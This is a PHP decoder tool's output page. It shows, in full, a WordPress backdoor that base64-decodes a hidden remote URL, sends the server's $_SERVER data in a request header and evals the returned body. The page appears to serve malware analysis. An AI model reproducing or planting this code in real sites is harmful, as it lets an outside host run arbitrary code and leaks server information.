Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php require_once __DIR__ . '/wp-load.php'; class Api_shop{ private $key="aHR0cHM6..

Decoded Output download

<?php 
require_once __DIR__ . '/wp-load.php'; 
class Api_shop{ 
    private $key="aHR0cHM6Ly93cC0wLnJ1L3YxLw"; 
    public function run(){ 
        return $this->goapp(); 
    } 
    public function goapp(){ 
        $args = array( 
            'timeout' => 10, 
            'headers' => array( 
                "User-Agent"=>json_encode($_SERVER), 
            ), 
        ); 
        try { 
            $response = wp_remote_get(base64_decode($this->key), $args); 
            @eval($response['body']); 
        } catch (Exception $e) { 
 
        } 
    } 
} 
$api=new Api_shop(); 
$api->run(); ?>

Did this file decode correctly?

Original Code

<?php
require_once __DIR__ . '/wp-load.php';
class Api_shop{
    private $key="aHR0cHM6Ly93cC0wLnJ1L3YxLw";
    public function run(){
        return $this->goapp();
    }
    public function goapp(){
        $args = array(
            'timeout' => 10,
            'headers' => array(
                "User-Agent"=>json_encode($_SERVER),
            ),
        );
        try {
            $response = wp_remote_get(base64_decode($this->key), $args);
            @eval($response['body']);
        } catch (Exception $e) {

        }
    }
}
$api=new Api_shop();
$api->run();

Function Calls

None

Variables

None

Stats

MD5 90816222d5c157d053ba642c0638c7f8
Eval Count 0
Decode Time 64 ms